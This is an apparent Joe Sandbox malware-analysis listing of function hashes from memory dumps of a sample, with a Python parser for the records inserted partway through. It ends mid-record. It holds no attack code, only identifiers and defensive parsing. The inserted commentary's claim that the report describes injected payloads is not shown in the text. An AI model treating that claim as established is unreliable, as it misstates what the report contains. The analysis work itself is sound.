                                                                        • Instruction Fuzzy Hash: 35212271614208DFDB15DF68D888B26BFA5FB88314F68C96DE90A4B246C37BD407CA61
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1849516232.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_12ed000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 61d907a4c07cab76bffe46fb20c010973b486322284d85244b3f30682057cf1a
                                                                        • Instruction ID: acb0646f760579f7244f283fb8105e31ae000f9fb85dda766b39b56fe9db672a
                                                                        • Opcode Fuzzy Hash: 61d907a4c07cab76bffe46fb20c010973b486322284d85244b3f30682057cf1a
                                                                        • Instruction Fuzzy Hash: 2C214975514208DFDB01DF98C5C4B26BBE5FB88324F64C56DE9094F283C376D406CA61
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ded0bd331fd70a5f42545db6ac23b6fb675b27c7c903460476d6b60986c86d8d
                                                                        • Instruction ID: 8129bfd204ee8591d4228192766f42712ad66bda5170a4f5c39982ee79cd053c
                                                                        • Opcode Fuzzy Hash: ded0bd331fd70a5f42545db6ac23b6fb675b27c7c903460476d6b60986c86d8d
                                                                        • Instruction Fuzzy Hash: 7B3112B5C01218DFEB24CF99C589BCDBFF5AB08324F24841AE418BB650C7B95845CFA1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ed921762e76d54a6dfa1c733b151d78567ae1160dd80511c253378ebf3379913
                                                                        • Instruction ID: ac3441751dc542a37ae7d7f2953adf6980e27ed116eb746ab1cfcbdcd53d6ab0
                                                                        • Opcode Fuzzy Hash: ed921762e76d54a6dfa1c733b151d78567ae1160dd80511c253378ebf3379913
                                                                        • Instruction Fuzzy Hash: 9A31F3B1C01258DFEB24DF9AC588B9EBFF5EB08314F24841AE418BB250C7B96845CF95
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d84cf06bd810f77f103b51823642a69632168aaca9a5820b198963e4d349c657
                                                                        • Instruction ID: 35418eec3f877aca8332f7704d3233ed0d5cbd2b5abcd142c4e0f5e5499eb423
                                                                        • Opcode Fuzzy Hash: d84cf06bd810f77f103b51823642a69632168aaca9a5820b198963e4d349c657
                                                                        • Instruction Fuzzy Hash: C611E5B2F193489FEF05CBB4CA166AD7BF4DF52111B2044E6D809C7282E93ADD16C752
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 25a9883b04038e6783476362e5d5a7c83d2f991d98d2290cc97fe0778f946dbf
                                                                        • Instruction ID: b3ebca83aaed975e6060d2e28d2d6b878fbc97000515bc984ac5d9575a3863cd
                                                                        • Opcode Fuzzy Hash: 25a9883b04038e6783476362e5d5a7c83d2f991d98d2290cc97fe0778f946dbf
                                                                        • Instruction Fuzzy Hash: 7821C9B4E1124ADFDF50CFB9C5456AEBBF0AF08204F1485AAE814E7340E738AA41CF51
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4304c8a3ffb7bc25f4933942e09644f411dc010b397de9e155910639b5ba03d4
                                                                        • Instruction ID: 17ede8b34186fb82e6e3710196672609736a8b706000f7a773853ffa460089f0
                                                                        • Opcode Fuzzy Hash: 4304c8a3ffb7bc25f4933942e09644f411dc010b397de9e155910639b5ba03d4
                                                                        • Instruction Fuzzy Hash: B12104B5A18219CFEB24CF90D5849ECB7B9FB4E311F106196D40EA7611CB34AD81CF20
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7235e48dbdf444f9ab7fd861bab077394fa6f087563e529ffd77496f42b2a838
                                                                        • Instruction ID: c8040766075697a43eca74abc4ac1c37661ed3ea356dd01ed47a2e04568f98f9
                                                                        • Opcode Fuzzy Hash: 7235e48dbdf444f9ab7fd861bab077394fa6f087563e529ffd77496f42b2a838
                                                                        • Instruction Fuzzy Hash: 591194B1B102078BDBA49A79D81067E7AA6BBC4750F049529941AC7344EA74C942CFD1
                                                                        Memory Dump Source
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 736ff0400867bb04b59cfcaf46a3d0e4eeadcd7deb3719bada5803bf5a2033cb
                                                                        • Instruction ID: 2635c3bd945aa0d94479cfd1ba016fda67adbc82817de0da8b28e69ca200f4a8
                                                                        • Opcode Fuzzy Hash: 736ff0400867bb04b59cfcaf46a3d0e4eeadcd7deb3719bada5803bf5a2033cb
                                                                        • Instruction Fuzzy Hash: 7EF082B2A04109AFEF08DFA8D945A9E7FA9EF14210B14816AE408D7264E631D9608B90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e800de35fbcac61ed5f2153183b59c4aaa53a7427a1ea6b21adf7b7e83a9c3ae
                                                                        • Instruction ID: d157c7bc5f4281803b57627db8ae4ebccb4fefc053ef4bd67585f266febda5b1
                                                                        • Opcode Fuzzy Hash: e800de35fbcac61ed5f2153183b59c4aaa53a7427a1ea6b21adf7b7e83a9c3ae
                                                                        • Instruction Fuzzy Hash: C3F0DAB0D0420A9FDB54DFA9C842AAEBBF8BB48300F1085AAE918E7340D7749500CFE1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b2c522296ff41c3eb6a9be5413ee93d3cdd58cefd673cbce6f81e32bb7967289
                                                                        • Instruction ID: dd35edcf6a543b3adb6137cf5e4bdd1077989012f075ec59965c7efef9df8859
                                                                        • Opcode Fuzzy Hash: b2c522296ff41c3eb6a9be5413ee93d3cdd58cefd673cbce6f81e32bb7967289
                                                                        • Instruction Fuzzy Hash: 40F0E2F4C0825ADFCB10CFF8CA092DCBFB1EB06314F1486AAE818A3681D7744641CB40
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 73d11d5d318f64efbe72d7d60394dddce72b192d3ff6d4133c9b0974b99204e0
                                                                        • Instruction ID: b5ccc9015ab5db2abbab27e18b3458b052d261b32f4c85437cf3017072da81fe
                                                                        • Opcode Fuzzy Hash: 73d11d5d318f64efbe72d7d60394dddce72b192d3ff6d4133c9b0974b99204e0
                                                                        • Instruction Fuzzy Hash: 14F0B4B4D042899FCB10CFA8C5452ADBFF0AF06314F14859AD818E3352D7340501DB00
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a75fe641b54d5ef88169e3cb68e062d7e7d5144bf0d73f2ba8549c0d54d0b09f
                                                                        • Instruction ID: c53dd2bc5844dc5a1cdb90d643ea54e90e57f8b09dfb460bdf28e437c5e98734
                                                                        • Opcode Fuzzy Hash: a75fe641b54d5ef88169e3cb68e062d7e7d5144bf0d73f2ba8549c0d54d0b09f
                                                                        • Instruction Fuzzy Hash: 6CF0C9F4D55208AFCB50DFB9D5496ADBBF4AB09210F5495A9D409E3600E7345A40CB45
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 63dddb966921294201bf0db605314d9b67d3e47158c388b1e8f21a98fa082995
                                                                        • Instruction ID: ff4cf34ccca56b92975b4040ae767734b431a2093a51030c235fed53a4eb9533
                                                                        • Opcode Fuzzy Hash: 63dddb966921294201bf0db605314d9b67d3e47158c388b1e8f21a98fa082995
                                                                        • Instruction Fuzzy Hash: C6F0A071518298CFE7118B64D4958B8BB7EFF4B242B0520E7E50E9B622CB318D51CF24
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f081a61455334d3c67980a6e8fb6f8a420a38b2d881f65724a3e5b7e3c60075a
                                                                        • Instruction ID: e823488dbecef478e17d40b24f2377575424891d9542f459cedc1aaed8766e48
                                                                        • Opcode Fuzzy Hash: f081a61455334d3c67980a6e8fb6f8a420a38b2d881f65724a3e5b7e3c60075a
                                                                        • Instruction Fuzzy Hash: 1BF03975D0020CEFCB10EFA9D4046ACBBB5FB88300F10C0AAA818A3350DA345A51DF85
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 144eb170991216fd05388646b75143d55ae689daf041af9a58e8f80e3270f445
                                                                        • Instruction ID: c56b53ec541d25f7f9bba2399132e9a7a0ebd3cafc099a716435fd4646e68828
                                                                        • Opcode Fuzzy Hash: 144eb170991216fd05388646b75143d55ae689daf041af9a58e8f80e3270f445
                                                                        • Instruction Fuzzy Hash: 02E039B4429110CFEB20DF58C8859A8BB79FF46300F05A0E2D8095B516CB34B940CF65
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 881a2168092f8349b6138874e0a878021af84c9b6b73e9ea0f84701f239df9a3
                                                                        • Instruction ID: bcc01c2dce8d8b4e5ebf0ddeb2c0dfd798572bbdfafef037f7a01c0abe216e68
                                                                        • Opcode Fuzzy Hash: 881a2168092f8349b6138874e0a878021af84c9b6b73e9ea0f84701f239df9a3
                                                                        • Instruction Fuzzy Hash: DCD012B7C00025978B10AFF4EA091EFFE35AB05620B518512E516BB914D3744765DBD1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 46c5b6f1d263c795883ea0e935c45f55e75f6ae6df8d75d968a53aaea608e250
                                                                        • Instruction ID: 8ac37fbcdc833349141e76b7e96eaf60172fbe49dc22a3a1998a65f1fd0295db
                                                                        • Opcode Fuzzy Hash: 46c5b6f1d263c795883ea0e935c45f55e75f6ae6df8d75d968a53aaea608e250
                                                                        • Instruction Fuzzy Hash: 04E0C2B094224CEBEB20EFB4C445AAD7BF8AB01214F504598D40953740DB382E44DB82
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c9dc450379d54ce0e16cbeae87ce29375d1bdd499dd0f460d2d76c47ff700ecd
                                                                        • Instruction ID: 8476ec502d3a1c5f30f22e1805d7328d0ab7096c1f52d3d46686fa2856875fd3
                                                                        • Opcode Fuzzy Hash: c9dc450379d54ce0e16cbeae87ce29375d1bdd499dd0f460d2d76c47ff700ecd
                                                                        • Instruction Fuzzy Hash: 32E08C71518218CFE7108BA4E8859A8B778FF8B242B0520E3E60A9B622CB319955DF75
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3149e48c9a887236a32b5fd13607b47304a83ec1e92b2b4467e9221c3ef0239b
                                                                        • Instruction ID: 8c54a7eb8e6a61f3e4fc62f3b831c1c76dec8ec8c627eda0a4e777a68165304a
                                                                        • Opcode Fuzzy Hash: 3149e48c9a887236a32b5fd13607b47304a83ec1e92b2b4467e9221c3ef0239b
                                                                        • Instruction Fuzzy Hash: 6EE0B6B0D4020ADFD750EFB9C905A5EBBF8BF08210F1185A9D019E7211E7B49A04CF91
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
                                                                        • Instruction ID: 90ba51fb4f45e47d6db80118ba5a95a35d37cf6acb6887473580bbaeea7674b8
                                                                        • Opcode Fuzzy Hash: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
                                                                        • Instruction Fuzzy Hash: 49D09EB2D40139D78B10AFE9DC054DFFF79EF05650F418126E915A7100D3755A21DBD1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4373b9605b613c3ba7bb5f343342b9321ad4804ce217a2cabb31d379806ff162
                                                                        • Instruction ID: 2a80f728c77517a20487da9523291b3967cdf60a922f55019127cbdd4a372af9
                                                                        • Opcode Fuzzy Hash: 4373b9605b613c3ba7bb5f343342b9321ad4804ce217a2cabb31d379806ff162
                                                                        • Instruction Fuzzy Hash: 1FD0A7B3C982498AD7200A35EA4D2AC7F70DB55201F28051FE58CC0440E4218250C6D4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 456490032d8827b8b93e34f3e88e3bc7ce9edbb066bf8b09557b768d79ede539
                                                                        • Instruction ID: af895d7ee12050f465f7fa5bfc619f93fdaa182dc0d39af54a1c1fae97948467
                                                                        • Opcode Fuzzy Hash: 456490032d8827b8b93e34f3e88e3bc7ce9edbb066bf8b09557b768d79ede539
                                                                        • Instruction Fuzzy Hash: 43D092B0911229CFEB91EF28E885B9C7BB6FB05200F109695E0096B214DB701A80CF41
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 21405fc777d1da3f07ee82014df5bc45eb9933e446aec7728c2872f66af627e4
                                                                        • Instruction ID: 327ed2ec53314f0991a77d7a4cec3b99fdfb5387ac549c06bfe8c2b29c2ac2e0
                                                                        • Opcode Fuzzy Hash: 21405fc777d1da3f07ee82014df5bc45eb9933e446aec7728c2872f66af627e4
                                                                        • Instruction Fuzzy Hash: 12C08CEB51D0809EFB153F30C918E002E08EFB5204B0AC1928244C9071E447D0349382
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e695378e1df2e21580f1dd2ebeada0eea2e5b781cbc51097216b5aa2cb10506d
                                                                        • Instruction ID: 238970b9f96e64593e4bb77e29affd4b40cb090e2931b3280e8d0e5edeac36df
                                                                        • Opcode Fuzzy Hash: e695378e1df2e21580f1dd2ebeada0eea2e5b781cbc51097216b5aa2cb10506d
                                                                        • Instruction Fuzzy Hash: D6C08C7109070C87E31027AAE40E37C3EE8A701302F489021F00D514218FA60450CBB9
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fffadea3108fd2b9dd7dd3dd656611e4acd10d4b7ba9b94c08c7c93aad17a5e5
                                                                        • Instruction ID: 6068e3e0ab41065d60364096e6be60e53e27fe37eeb8235228baaca51fc783ce
                                                                        • Opcode Fuzzy Hash: fffadea3108fd2b9dd7dd3dd656611e4acd10d4b7ba9b94c08c7c93aad17a5e5
                                                                        • Instruction Fuzzy Hash: 57B012F9176100F2702467B48C80B3F5421FBFB710F408C05324C0640085654474D26F
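The records above (one per function recovered by the IDA plugin, each tagged with the memory dump it came from, its Opcode/Instruction IDs and fuzzy hashes, and any API or string references) are easier to correlate across dumps and across samples once they are structured. The parser below is an added example written for this page; it is not code from the Joe Sandbox report or its IDA plugin. The two sample records are copied from this page. The field layout of the `.sdmp` file name beyond the process index and base address (which the page itself confirms through the matching `hcaresult_<pid>_<run>_<base>` snapshot names: 0x0E → 14, 0x11 → 17) is an assumption, as are the regexes and function names.

```python
"""Parse Joe Sandbox IDA-plugin function records into structured data.

Added example, not part of the Joe Sandbox report. The .sdmp name fields
beyond the process index and base address are assumed, not documented here.
"""
import re
from dataclasses import dataclass

# Constructed sample: two records copied from this page (one per memory dump).
SAMPLE = """\
Memory Dump Source
• Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 688327ab57123475892e19df4ccd300c95172667a495ec10061cce86edf139b5
• Instruction ID: a299d9621bd8b324bc70dc32555aab0b08bfa98f203de8f79dc3639ccbb6175d
• Opcode Fuzzy Hash: 688327ab57123475892e19df4ccd300c95172667a495ec10061cce86edf139b5
• Instruction Fuzzy Hash: 8DF0B4B4E1420EDFDB10CFA9D9416EDBBB4FB45310F1481AED81893350D7385646DB44
Strings
Memory Dump Source
• Source File: 00000011.00000002.1857841903.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2f20000_9758xBqgE1azKnB.jbxd
Similarity
• API ID:
• String ID: $tq$$tq$$tq
• API String ID: 0-2863945821
• Opcode ID: ea643fbc37c731280fc76a45b9ff61c24f89994d1cc058a9bda702dcb916541e
• Instruction ID: d2a79d50657d59513c246446a710c23556ae9fe6d07b2a47ed2f693b131da160
• Opcode Fuzzy Hash: ea643fbc37c731280fc76a45b9ff61c24f89994d1cc058a9bda702dcb916541e
• Instruction Fuzzy Hash: CEF1CF707002168FDB19AB7AD858B2E7BB3FB88300F108468E91A9F395DF759C45DB91
"""


@dataclass
class FunctionRecord:
    source_file: str = ""
    offset: int = 0
    based_on_pe: bool = False
    snapshot_file: str = ""
    api_id: str = ""
    string_id: str = ""
    api_string_id: str = ""
    opcode_id: str = ""
    instruction_id: str = ""
    opcode_fuzzy_hash: str = ""
    instruction_fuzzy_hash: str = ""


FIELD_MAP = {"Snapshot File": "snapshot_file", "API ID": "api_id",
             "String ID": "string_id", "API String ID": "api_string_id",
             "Opcode ID": "opcode_id", "Instruction ID": "instruction_id",
             "Opcode Fuzzy Hash": "opcode_fuzzy_hash",
             "Instruction Fuzzy Hash": "instruction_fuzzy_hash"}
BULLET_RE = re.compile(r"^[•\-*]\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
SOURCE_RE = re.compile(r"Source File: (?P<name>\S+), Offset: (?P<off>[0-9A-Fa-f]+), "
                       r"based on PE: (?P<pe>true|false)")
# Assumed layout: <process idx>.<run>.<dump id>.<base>.<page protection>. ...
DUMP_RE = re.compile(r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<run>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
                     r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.")
SNAP_RE = re.compile(r"^hcaresult_(?P<proc>\d+)_(?P<run>\d+)_(?P<base>[0-9A-Fa-f]+)_")
PAGE_EXECUTE_READWRITE = 0x40  # Windows page-protection constant


def parse_records(text):
    """Split the report text at each 'Memory Dump Source' line and collect
    the '• key: value' bullets of every record; label lines are skipped."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            if current is not None:
                records.append(FunctionRecord(**current))
            current = {}
            continue
        m = BULLET_RE.match(line) if current is not None else None
        if not m:
            continue
        key, val = m.group("key").strip(), m.group("val").strip()
        if key == "Source File":
            sm = SOURCE_RE.search(line)
            current.update(source_file=sm.group("name"),
                           offset=int(sm.group("off"), 16),
                           based_on_pe=sm.group("pe") == "true")
        elif key in FIELD_MAP:
            current[FIELD_MAP[key]] = val
    if current is not None:
        records.append(FunctionRecord(**current))
    return records


def decode_dump_name(name):
    """Numeric fields of an .sdmp name (layout assumed, see DUMP_RE)."""
    m = DUMP_RE.match(name)
    if not m:
        raise ValueError(f"unrecognised dump name: {name}")
    return {"process_index": int(m.group("proc"), 16), "run": int(m.group("run"), 16),
            "dump_id": int(m.group("dump")), "base": int(m.group("base"), 16),
            "protect": int(m.group("protect"), 16)}


def snapshot_matches_dump(rec):
    """Cross-check: snapshot name, dump name and Offset must agree."""
    d, s = decode_dump_name(rec.source_file), SNAP_RE.match(rec.snapshot_file)
    return bool(s) and int(s.group("proc")) == d["process_index"] \
        and int(s.group("run")) == d["run"] \
        and int(s.group("base"), 16) == d["base"] == rec.offset


def rwx_non_pe_records(records):
    """Functions living in RWX memory with no PE header behind it: the usual
    footprint of an unpacked or injected payload, as this report describes."""
    return [r for r in records if not r.based_on_pe
            and decode_dump_name(r.source_file)["protect"] == PAGE_EXECUTE_READWRITE]


def opcode_id_mismatches(records):
    """On this page Opcode ID always equals Opcode Fuzzy Hash; list exceptions."""
    return [r.opcode_id for r in records if r.opcode_id != r.opcode_fuzzy_hash]


def records_by_process(records):
    """Group records by the process index encoded in the dump name."""
    out = {}
    for r in records:
        out.setdefault(decode_dump_name(r.source_file)["process_index"], []).append(r)
    return out
```

Feeding the whole function listing of a report through `parse_records` gives a list that can be joined on `instruction_fuzzy_hash` or `opcode_id` against other samples' reports; `snapshot_matches_dump` is a cheap sanity check that the extraction kept each record's dump and snapshot lines together.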
Strings
Memory Dump Source
• Source File: 00000011.00000002.1857841903.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2f20000_9758xBqgE1azKnB.jbxd
Similarity
• API ID:
• String ID: $tq$$tq$$tq
• API String ID: 0-2863945821
• Opcode ID: ea643fbc37c731280fc76a45b9ff61c24f89994d1cc058a9bda702dcb916541e
• Instruction ID: d2a79d50657d59513c246446a710c23556ae9fe6d07b2a47ed2f693b131da160
• Opcode Fuzzy Hash: ea643fbc37c731280fc76a45b9ff61c24f89994d1cc058a9bda702dcb916541e
• Instruction Fuzzy Hash: CEF1CF707002168FDB19AB7AD858B2E7BB3FB88300F108468E91A9F395DF759C45DB91
Strings
Memory Dump Source
• Source File: 00000011.00000002.1857841903.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2f20000_9758xBqgE1azKnB.jbxd
Similarity
• API ID:
• String ID: $tq$$tq
• API String ID: 0-1837209516
• Opcode ID: f8c1fee68a630dd67f84df28cbf81d15b3dc7dbb507c1a68e6a9c460c6654e2c
• Instruction ID: 280fb5c0e63f3f46564461af2519bf8cf92fb48dddcde2c937ef6ed19a343769
• Opcode Fuzzy Hash: f8c1fee68a630dd67f84df28cbf81d15b3dc7dbb507c1a68e6a9c460c6654e2c
• Instruction Fuzzy Hash: D2C1DF707002168FDB19AB76D85872E7BB3FB88340F108468D91A9F399DF749C45DB91
Strings
Memory Dump Source
• Source File: 00000011.00000002.1857841903.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2f20000_9758xBqgE1azKnB.jbxd
Similarity
• API ID:
• String ID: $tq$$tq
• API String ID: 0-1837209516
• Opcode ID: f2e49d583f703ed1d9dd5453bc79a6b383d81656027fcdcde058a5e61e3a2503
• Instruction ID: d212fd8c0c8e585e65e80f12de64e31e890bd0e824c3b64baeabab44682ee22a
• Opcode Fuzzy Hash: f2e49d583f703ed1d9dd5453bc79a6b383d81656027fcdcde058a5e61e3a2503
